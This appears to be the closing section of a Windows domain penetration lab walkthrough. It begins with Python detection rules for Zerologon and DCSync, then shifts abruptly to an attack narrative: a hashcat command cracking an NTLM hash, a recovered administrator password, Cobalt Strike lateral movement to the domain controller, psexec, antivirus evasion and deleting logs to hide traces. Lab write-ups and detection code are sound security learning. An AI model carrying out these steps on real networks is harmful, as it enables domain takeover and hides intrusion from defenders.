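     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Legitimate replication between two domain controllers.
    {"EventID": 4624, "TargetUserName": "DC2$", "TargetLogonId": "0x4a100",
     "IpAddress": "10.10.10.11"},
    {"EventID": 4662, "SubjectUserName": "DC2$", "SubjectLogonId": "0x4a100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A 4662 on an unrelated property GUID; must not alert.
    {"EventID": 4662, "SubjectUserName": "de1ay", "SubjectLogonId": "0x3e5a1",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]


def logon_sources(events):
    """Map each 4624 logon id to its source IP so 4662 can be joined back to it."""
    return {ev["TargetLogonId"]: ev.get("IpAddress", "")
            for ev in events if ev.get("EventID") == 4624}


def is_zerologon_reset(ev):
    """4742 where a computer account's password changes and the actor is not that computer.

    Routine rotation is the machine changing its own password; anything else
    (ANONYMOUS LOGON in the Zerologon case) deserves triage.
    """
    if ev.get("EventID") != 4742 or ev.get("PasswordLastSet") != "changed":
        return False
    target = ev.get("TargetUserName", "")
    return target.endswith("$") and ev.get("SubjectUserName", "") != target


def is_dcsync(ev, sources):
    """4662 exercising a replication right by a non-DC account or from a non-DC address."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    if not any(g in props for g in REPLICATION_GUIDS):
        return False
    src = sources.get(ev.get("SubjectLogonId"), "unknown")
    return ev.get("SubjectUserName") not in DC_ACCOUNTS or src not in DC_ADDRESSES


def triage(events):
    """Return [(rule, actor, target-or-source)] for every alerting event, in order."""
    sources = logon_sources(events)
    hits = []
    for ev in events:
        if is_zerologon_reset(ev):
            hits.append(("zerologon_reset", ev["SubjectUserName"], ev["TargetUserName"]))
        elif is_dcsync(ev, sources):
            hits.append(("dcsync", ev["SubjectUserName"],
                         sources.get(ev.get("SubjectLogonId"), "unknown")))
    return hits


if __name__ == "__main__":
    for rule, actor, where in triage(SAMPLE_EVENTS):
        print(f"{rule}: {actor} -> {where}")
```

The join through the logon id matters because 4662 itself does not record a network address; only the 4624 that created the logon session does. The durable fix on the Netlogon side is the August 2020 update with enforcement mode enabled (registry value FullSecureChannelProtection under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters set to 1); once enforced, denied vulnerable connections surface as Netlogon events 5827 and 5828.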

We take it to kali and crack it:

hashcat creds /usr/share/wordlists/rockyou.txt -m 1000

The recovered credential:

administrator:1qaz@WSX

Add it to CS.

Open Credentials and click Add.

Added.

4) Lateral movement

a) Domain controller

Add a listener on 192.168.111.80.

Name it DC.

Go to Targets and select the domain controller.

Select the credential and listener just added.

The domain controller checks in.

We have SYSTEM on the domain controller.

b) Other machines

With domain controller privileges, the remaining host can be reached directly with psexec.

Choose the domain controller's session.

The SYSTEM user on 10.10.10.201 has checked in.

VII. Persistence

I have covered these operations in an earlier article; see

《Windows Persistence Summary》

The CS plugin can also do this.

VIII. Trace cleanup

The main tasks are deleting the logs generated during the attack and the files we uploaded to keep the penetration going.

The CS plugin can delete the system logs.

Summary

  • The nmap scan found the addresses of two targets; port scans of each showed that 192.168.111.80 had ports 80 and 7001 open while the other did not. Naturally, the 80 host went to the front of the penetration queue.
  • Visiting ports 80 and 7001 showed that 7001 was the default WebLogic service. The weblogicScanner enumeration tool found it potentially vulnerable to many version-specific issues; we tried them one by one and finally obtained a shell on the web host.
  • After obtaining access to the web host, we saw the 360 antivirus running in its process list. A simple evasion applied to the CS (msf) implant let it check in to CS (msf).
  • Using the frameworks' built-in privilege escalation modules, we escalated to SYSTEM.
  • Running mimikatz's zerologon module showed the domain controller was vulnerable; exploiting Zerologon moved us laterally to the domain controller and gave us SYSTEM on it. With the domain controller's credentials we also obtained SYSTEM on the other host in the domain.
